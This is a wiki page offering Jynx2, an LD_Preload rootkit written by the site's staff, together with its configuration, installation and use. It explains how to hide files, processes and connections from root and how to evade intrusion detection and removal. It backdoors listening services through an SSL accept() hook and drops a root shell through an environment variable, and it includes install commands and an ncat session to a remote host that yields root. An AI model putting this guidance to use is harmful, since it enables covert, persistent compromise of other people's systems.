Questions about this topic? Sign up to ask in the talk tab.

Jynx Rootkit/2.0

From NetSec
Jump to: navigation, search
c3el4.png Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.
                _   _,.-.' .-.
            _ .' |,'   ."".| |.""._
           ( || ,',"". `._`' `  '  `.
           `\ | `" .-"`-..`     .    `.
            |     `..--.._       |     \
          _,|      _...'_.'     ,+.     `.
     ,""'|   `...-'..""(__.._ -"   `"--.. `.
    |`._,'  ,'  /\ .'""` .'""`. `.    |  `. \
    '      / / /  ||    ||    |.`.`.   .   | \
     `.__,'-._'  /|` -"'  `-.'  \ \ \   `"-'  \
      ' `.   /  /_| | |'""| | .-""'`'"`-,.-"\  .
     . / .\ .  /  | | `._.' ||        ,'     \  \
    ' / / |/  /_.-+._`-..--"-.       .   .    \  `
   / /.'  '  ,'""'-. `"."'""'`..     |.        \  \
  / . |  j  .       . |        |\__," |.  `    '   \
 .  | |  |  |       ' |        '|   | ' `  \    \   .
 |    |  |  `.____,'   ..____,' |   |    .       \
 |    |  |  | ._  _..---._   _,'    |       .        '
 |    |  |  | | ""  .    |`"'   \ `.|     '  '  '     .
 |    |  |  | |     |    |       `  `      .  .  \    |
 |    |  |  | |     '    |        \  `.    |  |   .   |
 '    '  |  | |      .   `         \   \   |  |   |   |
  \      `  | |      |              .   `. |  |   |   |
   \      \ ' |      `    '          `    `+..|___|___|_........
    \      \ \|       '    .           `.    `.                 |
     `.     \ .        .   `             `.    `-.            .'
    _,'`.    \'         .   \              `-.._  `._       ,'
 _."     `._ `.`        |    .                       `._   .
`._       _,`"--`.      |     .                         `. |
  `-._ ,'              |      `.                         `|_
     ,'         |      |        `.                          `.
   .'   __...__.|      |          \ __..._     _,..,.__       `.
   `-`"'        `._..--'-.__      .'      `-..'        ``'"--..-'
                            `"---' 
                            
                            
    /$$$$$                                      /$$   /$$ /$$   /$$    
   |__  $$                                     | $$  /$$/|__/  | $$    
      | $$ /$$   /$$ /$$$$$$$  /$$   /$$       | $$ /$$/  /$$ /$$$$$$  
      | $$| $$  | $$| $$__  $$|  $$ /$$//$$$$$$| $$$$$/  | $$|_  $$_/  
 /$$  | $$| $$  | $$| $$  \ $$ \  $$$$/|______/| $$  $$  | $$  | $$    
| $$  | $$| $$  | $$| $$  | $$  >$$  $$        | $$\  $$ | $$  | $$ /$$
|  $$$$$$/|  $$$$$$$| $$  | $$ /$$/\  $$       | $$ \  $$| $$  |  $$$$/
 \______/  \____  $$|__/  |__/|__/  \__/       |__/  \__/|__/   \___/  
           /$$  | $$                                                   
          |  $$$$$$/                                                   
           \______/

RPU0j.png It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you

Special thanks to ErrorProne and xo for their contributions to this article.

Features

  • Hiding from netstat
  • Hiding from ps/top and /proc
  • File hiding
  • SSL connect accept() hook
  • Multi-factor authentication
  • Improved anti-removal features
  • SUID Drop-shell with environment variable
Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function, therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.

Archive Contents

 [root@ares jynx2]# ls
 Makefile  README  config.h  jynx2.c  packer.sh  reality.c
c3el4.png In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes.

Configuration Options in Config.h

RPU0j.png Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host.

MAGIC_STRING

  • MAGIC_STRING is the name of the directory that jynx installs to from the top level directory /. By default, this directory is hidden from the root user via the magic UID and GID. If the MAGIC_STRING is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".
c3el4.png this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory.

MAGIC_GID and MAGIC_UID

  • Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
Protip: Due to the fact that adding a user/group to the machine may set off a HIDS, we recommend that the MAGIC_UID and MAGIC_GID be set to a commonly unused service user's information (e.g. cupsd or lp's UID and GID) for maximum IDS Evasion, as no files will suddenly disappear and the least files in /etc/ will be modified.

REALITY_PATH

  • This is the path where reality.so will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so.
    Notice: It is recommended to set REALITY_PATH to /$MAGIC_STRING/reality.so in order to keep this file hidden from the root user.

CONFIG_FILE

c3el4.png The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable.

MULTI-FACTOR AUTHENTICATION

Notice: Jynx2 uses two-factor authentication.

With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.

The first are HIGH_PORT and LOW_PORT, which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "DEFAULT_PASS", it should be changed before compilation.

LIBC_PATH

LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run ldd $(which ls) or something similar.

Protip: On multi-lib systems, configure this path to point to the 64-bit version of LIBC.

ENV_VARIABLE

A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.

Download & Installation

c3el4.png It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device.

Installation

 # tar xzf jynx2.tgz     # Unpack tarball
 # nano -w config.h      # Set configuration
 # make all              # Compile jynx2.so                                                      
 # make install          # Installs jynx2, injects into ld preload, and sets correct GIDs

Usage

Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia 
 214473 drwxr-xr-x  2 user users   176 Mar  7 19:19 .
 177137 drwxr-xr-x 15 user users   952 Mar  5 22:15 ..
Protip: Make sure to using the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.

By default, with XxJynx as the ENV_VARIABLE configuration:

 >XxJynx=1 gpasswd /
 >id 
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)

Further Reading

We have more tools coming soon! Look forward to Chimera Live CD.
c3el4.png
These are the offensive security tools developed by our wiki staff.


Jynx2
is part of a series on

Linux

Visit the Linux Portal for complete coverage.